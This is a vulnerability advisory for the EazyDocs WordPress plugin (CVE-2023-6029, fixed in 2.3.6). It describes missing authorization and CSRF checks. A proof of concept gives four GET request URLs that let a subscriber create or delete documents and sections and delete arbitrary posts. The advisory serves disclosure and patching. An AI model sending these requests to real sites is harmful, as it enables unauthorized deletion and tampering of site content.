WordPress Plugin Vulnerabilities

EazyDocs < 2.3.6 - Subscriber+ Arbitrary Posts Deletion and Document Management

Description

The plugin does not have authorization and CSRF checks when handling documents and does not ensure that they are documents from the plugin, allowing any authenticated users, such as subscriber to delete arbitrary posts, as well as add and delete documents/sections.

Proof of Concept

1. Install the EazyDocs plugin
2. Log in as Subscriber
3. Make GET requests:
- To add a document : https://example.com/wp-admin/admin-post.php?Create_doc=yes&parent_title=doc%201
- To delete a post/document : https://example.com/wp-admin/admin-post.php?Doc_Delete=yes&DeleteID=12
- To add a section : https://example.com/wp-admin/admin-post.php?Create_Section=yes&parentID=90&is_section=sec%201
- To delete a section: https://example.com/wp-admin/admin-post.php?Section_Delete=yes&ID=110

When making requests, the page will redirect to the login page but the action is still completed, log in as Admin to check the result.

Affects Plugins

Plugin icon
eazydocs
Fixed in 2.3.6

References

CVE
CVE-2023-6029

Classification

Type
NO AUTHORISATION
OWASP top 10
A5: Broken Access Control
CWE
CWE-862
CVSS
6.5 (medium)

Miscellaneous

Original Researcher
Dao Xuan Hieu
Submitter
Dao Xuan Hieu
Verified
Yes
WPVDB ID
7a0aaf85-8130-4fd7-8f09-f8edc929597e

Timeline

Publicly Published
2023-12-21 (about 4 months ago)
Added
2023-12-21 (about 4 months ago)
Last Updated
2024-01-15 (about 4 months ago)

Other

Published
Title
Published
2023-12-08
Title
EmbedPress < 3.9.5 - Missing Authorization
Published
2023-12-21
Title
WP Custom Widget Area <= 1.2.5 - Subscriber+ Menus Creation/Deletion/Update
Published
2024-02-28
Title
WPvivid Backup and Migration < 0.9.69 - Unauthenticated SQLi & DoS
Published
2024-03-28
Title
Pods < 3.1 - Contributor+ Pods/Users Creation
Published
2024-04-22
Title
VK Block Patterns < 1.31.1.1 - Missing Authorization